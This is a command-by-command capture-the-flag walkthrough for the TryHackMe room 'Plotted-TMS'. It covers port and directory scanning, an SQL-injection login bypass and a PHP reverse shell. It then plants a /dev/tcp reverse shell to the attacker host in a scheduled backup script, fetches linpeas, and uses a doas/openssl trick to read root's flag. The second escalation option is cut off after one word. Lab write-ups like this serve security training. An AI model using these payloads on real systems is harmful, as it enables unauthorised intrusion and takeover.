Plotted-TMS

Room Link: https://tryhackme.com/room/plottedtms

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

No other ports found

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

TCP/445 - HTTP

Kali

gobuster dir -u http://$VICTIM:445 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Username: admin' or '1'='1'-- -
Password: admin

Initial Shell

Kali

git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
subl php-reverse-shell.php

Upgrade to a full TTY (autocomplete)

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Victim

# $KALI is expanded on the victim, so it must be set in that shell first (or written in literally)
rm -f /var/www/scripts/backup.sh
echo '#!/bin/bash' > /var/www/scripts/backup.sh
echo "sh -i >& /dev/tcp/$KALI/1338 0>&1" >> /var/www/scripts/backup.sh
chmod +x /var/www/scripts/backup.sh
cat /var/www/scripts/backup.sh

Kali

nc -lvnp 1338

Upgrade to a full TTY (autocomplete)

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

LinPeas

Kali

# download linpeas.sh to the current directory (piping wget's output to sh does nothing useful; wget writes to a file)
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
python2 -m SimpleHTTPServer 81

Victim

cd /tmp/
wget http://$KALI:81/linpeas.sh
chmod +x linpeas.sh 
./linpeas.sh

Privilege Escalation

Option #1

Victim

LFILE=/root/root.txt
doas -u root openssl enc -in "$LFILE"

Option #2

Victim

LFI
